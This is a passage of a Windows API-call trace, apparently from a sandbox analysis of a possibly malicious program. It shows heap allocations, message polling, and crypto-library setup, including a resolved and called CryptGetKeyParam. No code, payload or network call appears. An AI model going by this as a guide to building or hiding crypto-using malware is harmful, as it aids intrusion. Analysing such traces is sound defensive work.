CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0185.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0185.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd558 [0185.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0185.535] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0185.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0185.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0185.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0185.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0185.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0185.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0185.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0185.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0185.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0185.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0185.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0185.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0185.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0185.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0185.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0185.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0185.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0185.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0185.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0185.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0185.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0185.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0185.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0185.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0185.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0185.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0185.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0185.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0185.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0185.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0185.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0185.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0185.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0185.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0185.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0185.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0185.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0185.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0185.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0185.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0185.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0185.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0185.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0185.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0185.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0185.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0185.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0185.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0185.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0185.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0185.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0185.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0185.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0185.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0185.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0185.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0185.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0185.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0185.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0185.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0185.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0185.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0185.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0185.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0185.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0185.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0185.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0185.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0185.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0185.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0185.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0185.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0185.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0185.540] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0185.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0185.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0185.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0185.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0185.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0185.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0185.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0185.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0185.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0185.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0185.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0185.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0185.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0185.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0185.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0185.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0185.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0185.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0185.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0185.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0185.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0185.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0185.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0185.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0185.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0185.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0185.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0185.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0185.541] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0185.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0185.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0185.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0185.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0185.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0185.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0185.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0185.541] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2718, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2718*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0185.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0185.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0185.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0185.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0185.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0185.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0185.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0185.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0185.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0185.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0185.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0185.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0185.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0185.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0185.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0185.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0185.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0185.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0185.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0185.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0185.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0185.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0185.543] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0185.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0185.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0185.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0185.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0185.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0185.544] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0185.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0185.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0185.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0185.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0185.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0185.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0185.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0185.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0185.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0185.544] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.544] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.544] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.544] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.544] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.544] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.545] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0185.545] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.545] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 